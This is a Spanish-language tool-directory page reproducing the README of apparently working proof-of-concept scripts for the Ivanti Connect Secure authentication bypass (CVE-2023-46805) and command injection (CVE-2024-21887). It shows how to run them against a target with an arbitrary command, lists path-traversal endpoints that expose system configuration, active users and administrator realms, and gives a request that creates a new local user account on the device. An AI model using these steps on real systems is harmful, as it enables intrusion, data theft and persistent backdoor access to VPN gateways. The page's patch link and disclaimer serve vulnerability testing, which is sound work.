Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Una vulnerabilidad de omisión de autenticación en el componente web de Ivanti ICS 9.x, 22.x y Ivanti Policy Secure permite que un atacante remoto acceda a recursos restringidos al evitar las verificaciones de control.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2343hace 2 añosRevisado por Kitploit

CVE-2023-46805

Una vulnerabilidad de omisión de autenticación en el componente web de Ivanti ICS 9.x, 22.x e Ivanti Policy Secure permite a un atacante remoto acceder a recursos restringidos saltándose las comprobaciones de control.

uso: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

notas: chmod +x CVE-2023-46805.sh
requiere las aplicaciones curl y json_pp

resultado si es vulnerable, deberías ver algunas cosas:

image

CVE-2024-21887

Una vulnerabilidad de inyección de comandos en los componentes web de Ivanti Connect Secure (9.x, 22.x) e Ivanti Policy Secure permite a un administrador autenticado enviar solicitudes especialmente diseñadas y ejecutar comandos arbitrarios en el dispositivo.

  • ejecuta el poc (intentará los 2 puntos de entrada)

uso: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

resultado si es vulnerable, deberías ver algunas cosas y tu payload debería estar funcionando: image

notas: chmod +x CVE-2024-21887.sh
requiere las aplicaciones curl, xxd, tr y sed

Información jugosa

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

-crear una cuenta /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



Solución alternativa/Parche: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

Créditos: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


más sobre mí ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Aviso legal: IMPORTANTE: Este script se proporciona SOLO con fines educativos, pruebas éticas y uso legal. No lo utilices en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas informáticos y redes es ilegal, y los usuarios que realicen actividades no autorizadas están sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script.

Descargar herramienta